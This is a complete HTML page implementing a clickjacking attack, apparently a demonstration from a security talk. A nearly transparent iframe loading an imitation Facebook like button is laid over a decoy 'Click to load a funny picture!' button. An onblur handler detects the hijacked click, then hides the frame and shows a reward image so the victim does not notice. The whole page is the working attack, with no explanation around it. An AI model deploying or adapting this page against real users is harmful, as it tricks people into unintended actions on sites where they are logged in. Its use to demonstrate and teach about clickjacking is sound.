<html>
	<head>
		<style> 

			html {
				width: 100%;
				height: 100%;
			}

			body{
				cursor: hand;
				margin: 0; 
				padding: 0; 
			}

			#fblike {
				border: 0px;
				left: -14px;
				top: -12px;
				position: absolute;
				filter: alpha(opacity=0.25);
				z-index: 1;
				opacity: 0.25;
				overflow: hidden;
			}

			#clickme {
				overflow: hidden;
				width: 46px;
				height: 17px;
				position: absolute;
			}

			#winning {
				display: none;
			}

			button {
				max-width: 45px;
				max-height: 16px;
			}

			img {
			   position: absolute;
			   top: 50%;
			   left: 50%;
			   width: 500px;
			   height: 500px;
			   margin-top: -250px; /* Half the height */
			   margin-left: -250px; /* Half the width */
			}
		</style>
	</head>
	<body>
		<div id="clickme">
			<iframe id="fblike" name="fblike" src="https://talks.fletchto99.com/clickjacking/fb.html"> </iframe>
		</div>
		<div id="gimmick">
			<button>Click</button> to load a funny picture!
		</div>
		<img id="winning" src="1337.jpg"></img>
		<script>
			var d = document;
			var toClick = d.getElementById("clickme");
			var toLike = d.getElementById("fblike");
			var gimmick = d.getElementById("gimmick");
			var winning = d.getElementById("winning");

			window.onblur = function() {
				setTimeout(function() {
					toClick.style.left = -100;
					toClick.style.top = -100;
				}, 300);
				gimmick.style.display = "none";
				winning.style.display = "block";
			};
			window.focus();
		</script>
	</body>
</html>